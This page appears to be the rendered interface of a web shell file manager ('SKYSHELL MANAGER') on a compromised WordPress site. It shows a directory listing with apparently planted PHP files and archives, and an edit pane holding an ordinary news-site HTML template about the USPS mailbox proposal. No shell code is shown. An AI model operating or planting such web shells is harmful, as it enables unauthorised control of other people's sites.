📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: usnews.php
<!DOCTYPE html> <html> <head> <title>News Todaypost - Us news</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="css/animate.css"> <link rel="stylesheet" type="text/css" href="css/slick.css"> <link rel="stylesheet" type="text/css" href="css/theme.css"> <link rel="stylesheet" type="text/css" href="css/style.css"> <!--[if lt IE 9]> <script src="assets/js/html5shiv.min.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body> <!--<div id="preloader"> <div id="status"> </div> </div>--> <a class="scrollToTop" href="#"><i class="fa fa-angle-up"></i></a> <div class="container"> <header id="header"> <div class="row"> <div class="col-lg-12 col-md-12"> <div class="header_top"> <div class="header_top_right"> <!--<form action="#" class="search_form"> <input type="text" placeholder="Text to Search"> <input type="submit" value=""> </form>--> <h4>+770-962-7884</h4> </div> </div> <div class="header_bottom"> <div class="header_bottom_left"><a class="logo" href="index.php"><img src="images/news.png" title="" alt=""/></a></div> <div class="header_bottom_right"><a><img src="images/flag.png" alt=""></a></div> </div> </div> </div> </header> <div id="navarea"> <nav class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav custom_nav"> <li><a href="index.php">Home</a></li> <li class="active"><a href="usnews.php">Us News</a></li> <li><a href="world.php">World</a></li> <li><a href="techandmedia.php">Tech and Media</a></li> <li><a href="sports.php">Sports</a></li> <li><a href="politics.php">Politics</a></li> <li><a href="contact-us.php">Contact</a></li> <li><a href="subscribe.php">Subscribe us</a></li> </ul> </div> </div> </nav> </div> <section id="mainContent"> <div class="content_top"> <div class="row"> <div class="col-lg-6 col-md-6 col-sm6"> <div class="latest_slider"> <div class="slick_slider"> <div class="single_iteam"><img src="images/world.png" alt=""> <h2><a class="slider_tittle" href="techandmedia.php">Technology World Of America</a></h2> </div> <div class="single_iteam"><img src="images/sports1.png" alt=""> <h2><a class="slider_tittle" href="sports.php">sports Of America</a></h2> </div> <div class="single_iteam"><img src="images/technology.png" alt=""> <h2><a class="slider_tittle" href="techandmedia">Fun and Games</a></h2> </div> <div class="single_iteam"><img src="images/weather.png" alt=""> <h2><a class="slider_tittle">Weather in United states</a></h2> </div> </div> </div> </div> <div class="col-lg-6 col-md-6 col-sm6"> <div class="content_top_right"> <ul class="featured_nav wow fadeInDown"> <li><img src="images/basketball.jpg" alt=""> <div class="title_caption"><a href="pages/single.html">Sports : Basketball</a></div> </li> <li><img src="images/alabama.jpg" alt=""> <div class="title_caption"><a href="pages/single.html">4 Alabama players announce they are declaring for NFL draft</a></div> </li> <li><img src="images/cloud.jpg" alt=""> <div class="title_caption"><a href="pages/single.html">Cloud Computing</a></div> </li> <li><img src="images/politics.jpg" alt=""> <div class="title_caption"><a href="pages/single.html">politics</a></div> </li> </ul> </div> </div> </div> </div> <div class="content_middle"> <!--<div class="col-lg-3 col-md-3 col-sm-3"> <div class="content_middle_leftbar"> <div class="single_category wow fadeInDown"> <h2> <span class="bold_line"><span></span></span> <span class="solid_line"></span> <a href="#" class="title_text">Tech and Media</a> </h2> <ul class="catg1_nav"> <li> <div class="catgimg_container"> <a href="pages/single.html" class="catg1_img"><img alt="" src="images/techandmedia.jpg"></a></div> <h3 class="post_titile"><a href="pages/single.html">YouTube star Austin Jones pleads guilty</a></h3> </li> <li> <div class="catgimg_container"> <a href="pages/single.html" class="catg1_img"><img alt="" src="images/instacart.jpg"></a></div> <h3 class="post_titile"><a href="pages/single.html">Instacart and Doordash workers don't always receive the tips you add on</a></h3> </li> </ul> </div> </div> </div> <div class="col-lg-6 col-md-6 col-sm-6"> <div class="content_middle_middle"> <div class="slick_slider2"> <div class="single_featured_slide"> <a href="pages/single.html"><img src="images/military.webp" alt=""></a> <h2><a href="pages/single.html">Military İntervention News</a></h2> <p>Morning Update: The victims of the CP derailment; Canada urges Venezuela’s military to back Guaido</p> </div> <div class="single_featured_slide"> <a href="pages/single.html"><img src="images/elchapo.webp" alt=""></a> <h2><a href="#">El Chapo</a></h2> <p>‘El Chapo’ jury set to begin deliberations, alleged drug lord could face life in prison..</p> </div> <div class="single_featured_slide"> <a href="pages/single.html"><img src="images/congress.webp" alt=""></a> <h2><a href="#">Praesent vitae quam vitae arcu posuer 3</a></h2> <p>Nunc tincidunt, elit non cursus euismod, lacus augue ornare metus, egestas imperdiet nulla nisl quis mauris. Suspendisse a pharetra urna. Morbi dui lectus, pharetra nec elementum eget, vulput...</p> </div> </div> </div> </div> <div class="col-lg-3 col-md-3 col-sm-3"> <div class="content_middle_rightbar"> <div class="single_category wow fadeInDown"> <h2> <span class="bold_line"><span></span></span> <span class="solid_line"></span> <a href="#" class="title_text">Politics</a> </h2> <ul class="catg1_nav"> <li> <div class="catgimg_container"> <a href="pages/single.html" class="catg1_img"><img alt="" src="images/governor.jpg"></a></div> <h3 class="post_titile"><a href="pages/single.html"> Democratic Party has zero tolerance</a></h3> </li> <li> <div class="catgimg_container"> <a href="pages/single.html" class="catg1_img"><img alt="" src="images/santos.jpg"></a></div> <h3 class="post_titile"><a href="pages/single.html">One Pennsylvania town could serve as Trump's State of the Union bellwether</a></h3> </li> </ul> </div> </div> </div>--> </div> <div class="content_bottom"> <div class="col-lg-8 col-md-8"> <div class="content_bottom_left"> <div class="single_category wow fadeInDown"> <h2> <span class="bold_line"><span></span></span> <span class="solid_line"></span> <a class="title_text" href="#">MailBox</a> </h2> <div class="business_category_left wow fadeInDown"> <ul class="fashion_catgnav"> <li> <div class="catgimg2_container"> <a href="pages/single.html"><img alt="" src="images/mailbox.jpg"></a> </div> </li> </ul> </div> <div class="business_category_right wow fadeInDown"> <h2 class="catg_titile"><a href="">Your Mailbox Could Be Opened Up To Private Carriers</a></h2> <div class="comments_box"> <span class="meta_date">2/2/2019</span> <span class="meta_comment"><a href="#">No Comments</a></span> <span class="meta_more"><a href="#">Read More...</a></span> </div> <p style="margin: 0 0 10px; line-height:30px;">By law, only you and the U.S. Postal Service are allowed to put things in your mailbox. But what if companies like FedEx and UPS could do it too?<br> That could happen under a recommendation by the Trump administration.<br></p> </div> </div> <div class="games_fashion_area"> <p style="margin: 0 0 10px; line-height: 30px;"> A White House task force said in December that USPS should "explore franchising the mailbox as a means of generating revenue."<br> The Postal Service could use the cash.<br> It's been losing money for years, including a $3.9 billion loss in fiscal 2018. It's no surprise. People are mailing fewer letters — first-class volume dropped by 2.1 billion pieces last year. To help offset that drop, USPS raised stamp prices by 5 cents in January — its largest increase ever.<br> Mailing Just Got More Expensive: Forever Stamps See Biggest Price Increase Ever<br> And the Postal Service is still struggling to pay $5.5 billion each year in future retiree benefits.<br> By allowing access to private companies for a fee, the agency could earn cash without making changes to its current products, the task force says. The proposal did not name any specific companies, but it brings firms like FedEx and the United Parcel Service to mind.<br> Those companies currently leave small packages on your doorstep instead of your mailbox because USPS has a mailbox monopoly — and has for decades.<br> In 1934, during the Great Depression, Congress enacted a law prohibiting anyone from putting their hands in mailboxes — except for the Postal Service and the customer to whom it was delivering the mail. The law — aimed at clamping down on people skimping on postage — has been in effect ever since. </p> <p style="margin: 0 0 10px; line-height:30px;">The scope of the mailbox monopoly has been tested from time to time. The Supreme Court even heard a 1981 case about it and upheld its constitutionality. If the Trump administration's recommendation is implemented, it "would be a new way of the Postal Service operating its exclusive control over everyone's mailboxes — no doubt about that," Postal Regulatory Commission Chairman Robert Taub says. Taub, a Trump appointee who heads the independent agency that oversees the Postal Service, says the recommendation wouldn't have come about if the agency wasn't in such a dire financial state. </p> </div> </div> </div> <div class="col-lg-4 col-md-4"> <div class="content_bottom_right"> <div class="single_bottom_rightbar"> <h2>Latest Stories </h2> <ul class="small_catg popular_catg wow fadeInDown"> <li> <div class="media wow fadeInDown"> <a href="#" class="media-left"><img alt="" src="images/sanders.jpg"> </a> <div class="media-body"> <h4 class="media-heading"><a href="#">Sen. Sanders asks why drug, once free, now costs $375K </a></h4> <p>WASHINGTON - U.S. Senator Bernie Sanders sent a letter to Catalyst Pharmaceuticals on Monday </p> </div> </div> </li> <li> <div class="media wow fadeInDown"> <a href="#" class="media-left"><img alt="" src="images/kansas.jpg"> </a> <div class="media-body"> <h4 class="media-heading"><a href="#">Kansas judge said children in sex-abuse case were 'aggressor',</a></h4> <p>Prosecutors in Kansas are considering appealing the sentencing decision of a judge who called two minor girls the "aggressor" in a sex-abuse case involving a 67-year-old man.</p> </div> </div> </li> <li> <div class="media wow fadeInDown"> <a href="#" class="media-left"><img alt="" src="images/drump.png"> </a> <div class="media-body"> <h4 class="media-heading"><a href="#">Boy who is bullied because he's named Trump </a></h4> <p>A 6th-grade boy who is bullied because of his last name, Trump, is among about a dozen people invited by President Donald Trump . </p> </div> </div> </li> </ul> </div> </div> </div> </section> </div> <footer id="footer"> <div class="footer_top"> <div class="container"> <div class="row"> <div class="col-lg-4 col-md-4 col-sm-4"> <div class="single_footer_top wow fadeInDown"> <h2>Quick Links</h2> <ul class="labels_nav"> <li><a href="archieve-main.html">Us News</a></li><br> <li><a href="world.php">World</a></li><br> <li><a href="single.html">Tech and Media</a></li><br> <li><a href="archive2.html">Sports</a></li><br> <li><a href="archieve-main.html">Politics</a></li> </ul> </div> </div> <div class="col-lg-4 col-md-4 col-sm-4"> <div class="single_footer_top wow fadeInLeft"> <h2>Useful Links</h2> <ul class="flicker_nav"> <li><a href="" title="" alt="">Privacy Policy</a></li> <li><a href="" title="" alt="">Terms and conditions</a></li> <li><a href="" title="" alt="">Subscribe</a></li> <li><a href="" title="" alt="">Unsubscribe</a></li> </ul> </div> </div> <div class="col-lg-4 col-md-4 col-sm-4"> <div class="single_footer_top wow fadeInRight"> <h2>Contact Us</h2> <p>2490 Cruse Rd NW,<br> Lawrenceville,<br> GA 30044, USA, </p> </div> </div> </div> </div> </div> <div class="footer_bottom"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12"> <div class="footer_bottom_left"> <p>Copyright © 2019 <a href="index.php">Chequered News</a></p> </div> </div> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12"> <div class="footer_bottom_right"> <p>Developed BY <a href="http://webberax.com/">Webberax</p> </div> </div> </div> </div> </div> </footer> <script src="js/jquery.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/wow.min.js"></script> <script src="js/slick.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save